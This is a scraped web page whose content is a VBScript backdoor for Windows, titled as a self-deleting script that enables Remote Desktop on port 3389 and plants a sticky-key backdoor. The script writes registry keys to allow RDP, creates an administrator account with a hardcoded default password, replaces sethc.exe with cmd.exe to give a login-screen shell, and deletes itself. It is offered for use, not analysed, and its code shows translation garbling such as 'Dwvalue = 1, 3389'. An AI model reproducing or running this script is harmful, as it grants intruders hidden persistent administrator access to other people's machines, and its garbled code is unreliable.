You can automatically delete vbs that enable 3389 to create a user's sticky key backdoor.
Last Update:2018-12-08
Source: Internet
Author: User
On Error resume next
Const HKEY_LOCAL_MACHINE = & h80000002
Strcomputer = "."
Set stdout = wscript. stdout
Set oreg = GetObject ("winmgmts: {impersonationlevel = impersonate }! \\"&_
Strcomputer & "\ Root \ default: stdregprov ")
Strkeypath = "SYSTEM \ CurrentControlSet \ Control \ Terminal Server"
Oreg. createkey HKEY_LOCAL_MACHINE, strkeypath
Strkeypath = "SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ WDS \ rdpwd \ TDS \ Tcp"
Oreg. createkey HKEY_LOCAL_MACHINE, strkeypath
Strkeypath = "SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ winstations \ RDP-TCP"
Strkeypath = "SYSTEM \ CurrentControlSet \ Control \ Terminal Server"
Strvaluename = "fdenytsconnections"
Dwvalue = 0
Oreg. setdwordvalue HKEY_LOCAL_MACHINE, strkeypath, strvaluename, dwvalue
Strkeypath = "SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ WDS \ rdpwd \ TDS \ Tcp"
Strvaluename = "portnumber"
Dwvalue = 1, 3389
Oreg. setdwordvalue HKEY_LOCAL_MACHINE, strkeypath, strvaluename, dwvalue
Strkeypath = "SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ winstations \ RDP-TCP"
Strvaluename = "portnumber"
Dwvalue = 1, 3389
Oreg. setdwordvalue HKEY_LOCAL_MACHINE, strkeypath, strvaluename, dwvalue
On Error resume next
Dim username, password: If wscript. arguments. count then: username = wscript. arguments (0): Password = wscript. arguments (1): else: username = "wykgif": Password = "wykgif123456": end if: Set wsnetwork = Createobject ("wscript. network "): OS =" winnt: // "& wsnetwork. computername: Set Ob = GetObject (OS): Set OE = GetObject (OS & "/administrators, group"): Set OD = ob. create ("user", username): OD. setpassword password: OD. setinfo: Set of = GetObject (OS & "/" & username & ", user"): Oe. add (. adspath) 'wscript. echo. adspath
On Error resume next
Dim OBJ, success
Set OBJ = Createobject ("wscript. Shell ")
Success = obj. run ("CMD/C takeown/F % SystemRoot % \ system32 \ sethc.exe & Echo y | cacls % SystemRoot % \ system32 \ sethc.exe/g % username %: F & copy % SystemRoot % \ system32 \ cmd.exe % SystemRoot % \ system32 \ acmd.exe & copy % SystemRoot % \ system32 \ sethc.exe % SystemRoot % \ system32 \ asethc.exe & del % SystemRoot % \ system32 \ sethc.exe & Ren % SystemRoot % \ system32 \ acmd.exe sethc.exe ", 0, true)
Createobject ("scripting. FileSystemObject"). deletefile (wscript. scriptname)